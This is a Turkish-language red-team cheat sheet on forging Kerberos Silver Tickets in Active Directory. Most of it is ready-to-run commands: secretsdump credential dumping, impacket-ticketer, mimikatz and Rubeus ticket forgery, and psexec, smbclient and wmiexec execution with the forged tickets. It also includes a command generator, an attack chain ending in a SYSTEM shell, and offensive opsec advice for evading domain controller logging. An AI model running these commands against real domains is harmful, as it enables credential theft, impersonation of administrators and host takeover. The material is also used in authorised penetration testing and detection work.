Silver Ticket
MITRE ATT&CK · T1558.002 phase: lateral movement / persistence
MITRE ATT&CK · T1558.002 phase: lateral movement / persistence
Silver Ticket, hedeflenen servisin hesabının (bilgisayar hesabı veya servis hesabı) NTLM hash’i / AES anahtarı ile üretilen sahte bir TGS’tir. Golden Ticket’tan farkı: krbtgt gerekmez ve bilet yalnızca tek bir servise (CIFS, HOST, MSSQL, HTTP, LDAP…) geçerlidir. Bilet doğrudan servise sunulur; DC ile etkileşim gerekmez — bu da onu daha sessiz yapar (TGS-REQ yok, Event 4769 yok).
Golden vs Silver
Section titled “Golden vs Silver”| Golden | Silver | |
|---|---|---|
| Anahtar | krbtgt | Servis / machine hesabı |
| Bilet | TGT (sonra herhangi TGS) | Tek SPN için TGS |
| DC trafiği | TGS isterken DC’ye gider | Servise doğrudan |
| Kapsam | Domain-wide | Tek host/servis |
| Sessizlik | Orta | Yüksek |
Ön koşul
Section titled “Ön koşul”- Hedef servis hesabının hash’i: Bilgisayar: MACHINE$ NTLM/AES — LSASS, DCSync ( -just-dc-user ‘PC01$’ ), SAM (local).
- Servis kullanıcısı: Kerberoasting kırığı veya DCSync.
impacket-secretsdump -just-dc-user 'SERVER01$' domain.local/admin:'Pass'@DCimpacket-secretsdump domain.local/Administrator@server01 -hashes :LOCALADMIN_NTÜretim — impacket
Section titled “Üretim — impacket”-
Servis hash’ini ve SID’i topla.
-
TGS forge et — örnekler:
Terminal window impacket-ticketer -nthash <machine_or_service_NT> \-domain-sid S-1-5-21-1111-2222-3333 \-domain domain.local \-spn cifs/server01.domain.local \-user-id 500 -groups 512,513,518,519,520 \AdministratorTerminal window impacket-ticketer -nthash <NT> -domain-sid S-1-5-21-... \-domain domain.local -spn host/server01.domain.local AdministratorTerminal window impacket-ticketer -nthash <DC$_NT> -domain-sid S-1-5-21-... \-domain domain.local -spn ldap/dc01.domain.local AdministratorTerminal window impacket-ticketer -nthash <sql_svc_NT> -domain-sid S-1-5-21-... \-domain domain.local -spn MSSQLSvc/sql01.domain.local:1433 AdministratorTerminal window impacket-ticketer -aesKey <service_aes256> -domain-sid S-1-5-21-... \-domain domain.local -spn cifs/server01.domain.local Administrator -
Kullan :
Terminal window export KRB5CCNAME=Administrator.ccacheTerminal window impacket-psexec -k -no-pass domain.local/Administrator@server01.domain.localTerminal window impacket-smbclient -k -no-pass domain.local/Administrator@server01.domain.localTerminal window impacket-wmiexec -k -no-pass domain.local/Administrator@server01.domain.local
mimikatz / Rubeus
Section titled “mimikatz / Rubeus”kerberos::golden /user:Administrator /domain:domain.local \ /sid:S-1-5-21-... /target:server01.domain.local \ /service:cifs /rc4:<machine_NT> /ptt# Not: mimikatz'ta "golden" komutu /service ile silver üretirRubeus.exe silver /service:cifs/server01.domain.local \ /rc4:<NT> /domain:domain.local /sid:S-1-5-21-... \ /user:Administrator /pttHangi SPN ne işe yarar?
Section titled “Hangi SPN ne işe yarar?”| SPN | Kullanım |
|---|---|
cifs/fqdn | SMB, PsExec, dosya paylaşımı |
host/fqdn | Task scheduler, WinRM bazı akışlar |
ldap/fqdn | LDAP / DCSync (DC$ hash) |
http/fqdn | HTTP SPN’li web / ADCS |
MSSQLSvc/fqdn:port | SQL Windows auth |
WSMan/fqdn | WinRM |
Çok servise ihtiyaç varsa birden fazla Silver üret veya Golden kullan.
Komut üreteci
Section titled “Komut üreteci”Silver Ticket · ticketer
embedded toolGenerated command
impacket-ticketer -nthash 31d6cfe0d16ae931b73c59d7e0c089c0 -domain-sid S-1-5-21-111-222-333 -domain domain.local -spn cifs/fileserver.domain.local AdministratorSilver Ticket · ticketer
Section titled “Silver Ticket · ticketer”Saldırı zinciri
Section titled “Saldırı zinciri”Kerberoast → svc_sql hash kırıldı → Silver Ticket SPN=MSSQLSvc/sql01 → sysadmin / xp_cmdshell → veya machine hash (local admin dump) → Silver cifs/sql01 → SYSTEM shellOpsec (ofansif)
Section titled “Opsec (ofansif)”- DC’ye Kerberos trafiği yok → Golden’a göre daha az 4768/4769.
- Servis tarafında hâlâ logon/access log’u oluşur.
- PAC’te Domain Admins grupları ile Administrator — servis PAC doğrulaması yapıyorsa (PAC validation) machine key ile imza geçerli olduğu sürece genelde kabul edilir; bazı servisler ek kontrol yapar.
- Machine parola ~30 günde değişir → Silver ömrü sınırlı; hash’i yenile.
- AES Silver, RC4’ten daha az dikkat çeker (modern etype).
Yaygın tuzaklar
Section titled “Yaygın tuzaklar”- Yanlış SPN ( CIFS vs cifs , NetBIOS vs FQDN).
- Bilgisayar hash’i yerine kullanıcı hash’i (veya tersi).
- Tek Silver ile WMI + SMB beklemek — farklı SPN gerekebilir.
- IP ile bağlantı; Kerberos isim ister.
- user-id / grup RID’siz bilet bazı erişimlerde yetersiz kalır.
Sonraki adımlar
Section titled “Sonraki adımlar”Pass-the-Ticket · Golden Ticket · Exec methods · Persistence